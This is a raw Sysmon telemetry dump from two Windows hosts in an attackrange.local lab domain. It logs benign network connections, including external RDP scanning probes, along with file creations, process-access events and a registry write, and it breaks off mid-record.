354300x800000000000000063427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.434{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58176-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.430{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58240-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000063425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.175{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\ClickToRun\ProductReleases\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\BIT6FA1.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.175{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x800000000000000063423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50922784C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+40a441|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+46d554|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+106113|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1c0b10|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1cbb77|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1cb825|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1c49b6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+682c4|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+10dd8a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+10e9d1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+10eee0|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.175{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D98DDD627CBF63A51CA28465E1AD6F93,SHA256=E676EB4EDAD6EE7E51C5292817D79FAA0FC5EAC0EF2455DB6CA09CB3C20E5EA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.909{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F53D87C72B5536DB192F27A7D287314,SHA256=C6BE69115D6094190DD36A2A3EAFD21D446E08D827176BDE46FEF5116F6403A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.706{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\ClickToRun\ProductReleases\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\BIT7474.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.644{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B834A7C66951D90C0BC68827BF0D500,SHA256=C20AB83131A0FEB53A682854290800AAE28B4E685D1CA390925DD9894CACD6F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-journalMD5=311903B7BCE310463640A29057057858,SHA256=5FF9CA41973E7C9910AF4A1D7086B3B60CCFF0BE6359FED24381C056744617A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.566{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-journalMD5=3F68694634573B254AA4B5DB3D15CF54,SHA256=EC1F582B5AB61284835E3C254E9EBD768CA2975E26FF262DB4F60F78CDB54E51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\Temp\WIN-DC-339-20210420-1453.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.399{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57465-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 23542300x800000000000000063438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.410{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\ClickToRun\ProductReleases\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\BIT7474.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.410{A7A01FEF-B626-607E-1600-00000000BB01}15404372C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x800000000000000063436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.410{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50922784C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+40a441|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+46d554|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+106113|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1c0b10|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1cbb77|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1cb825|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+1c49b6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\StreamServer.dll+682c4|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+10dd8a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+10e9d1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+10eee0|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000063435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:42.907{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59606-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:42.118{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61610-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:42.106{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57464-false10.0.1.12-8000- 23542300x800000000000000063432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.222{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\WIN-DC-339-20210420-1453a.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049301Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:44.979{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=031E501ACFE2F0FB816BCC83195CFECC,SHA256=DB01D4D2D0267A7F12A4C485D9AAFE2B96F98064EE7801D0E582B6DCEB092275,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049300Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:42.029{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63741-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000063448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:45.659{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C302D52227FA7F59F17DB34549A4F2B6,SHA256=3211294332C4471E19EBC07845ADDF7657E7E51AE8AF5D72E1214F4030752F5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.006{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57467-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000063446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.786{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57466-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000049304Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:43.692{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65236-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 13241300x800000000000000049303Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:53:45.401{85C0FFC9-B7ED-607E-1000-00000000BB01}992C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d735f4-0xf6772698) 23542300x800000000000000049302Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:45.229{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CA12D3ABC7481F331DF05CBD3B778BA,SHA256=080CCA52AD98C7F6D0BA03B064646C1AE8F22707D0341CFE4C1C286DD85F3B8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:45.764{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57469-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 23542300x800000000000000063454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:46.706{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=170F8C9A3D8CFA13742D6749E85F8E11,SHA256=CC23AADBC77FF9F0E05AB2CE90931D9EA793857C478BE657B4D2F32CA67FCB88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:46.644{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69514702A46F23E183CC77A33E9C8798,SHA256=79EF7D8D3D31B65623BB8E993BF663C0D5532C6F059518368D39E532DCFD298E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:46.613{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeC:\Users\ADMINI~1\AppData\Local\Temp\WIN-DC-339-20210420-1453b.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:45.504{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51075-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:45.441{A7A01FEF-B626-607E-1100-00000000BB01}1176C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-339.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal123ntp 354300x800000000000000063449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:44.483{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57468-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000049308Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:44.994{85C0FFC9-B7ED-607E-1000-00000000BB01}992C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-895.attackrange.local123ntpfalse51.105.208.173-123ntp 354300x800000000000000049307Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:44.993{85C0FFC9-B7ED-607E-1000-00000000BB01}992C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-895.attackrange.local123ntpfalse10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal123ntp 354300x800000000000000049306Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:44.970{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50880-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049305Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:46.009{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93E29E80F87B6D63C39570EF1D60CF51,SHA256=81E97F85E830BB6A1B310F8155B76BC819D6AAD1DA5B619B161D735E1037D446,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:47.722{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B274A9C3BE6CCCBE50D38A5794537A1,SHA256=E6C3A73A9FD397A9DBBD2870502C9868067F2127D157F45C5FDBFB6C78436629,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049312Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:45.789{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52475-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049311Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:45.150{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50343-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049310Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:47.009{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=938F202E57AF76D1395A117C1EDD0994,SHA256=3F97BBCF5D9570C7B2A9E974BA7F7BF418BFD6366E99A3BDA3C7B0AFD1A29E8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049309Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:47.009{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1CBF584EB40C8DF249E9897996BC7D9,SHA256=39F32D27631AC3891DDF7C450A93A3D6CABCAFF55A8B13E84B8A1CEFEFED69DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:48.738{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=781CEE1A3DF9D064F8AD72E5ECDE026B,SHA256=B1D0255377B9F75A38CDD6925CCF3E553C030DFCE60B31FBDEDC552940F4439F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:47.585{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52476-false10.0.1.14win-dc-339.attackrange.local49676- 354300x800000000000000049317Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:47.139{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52476-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x800000000000000049316Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:46.641{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51829-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049315Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:46.475{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50712-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049314Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:48.540{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB031007E8783BABAFDF35FFFFA7FE9B,SHA256=62118EE113A01282CD8EC463E39A25A1780C08984F7BD416155610FCAAF2C0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049313Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:48.040{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46BE6ACC2476C4FBCA0A4503BB93C0AB,SHA256=B5A787F26CAA18BE18427A1FBFE26ED8EFB1D688BD3D54B973861DB0DE8DA70D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:48.794{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-6097-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000063462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.832{A7A01FEF-B626-607E-1400-00000000BB01}12763692C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft 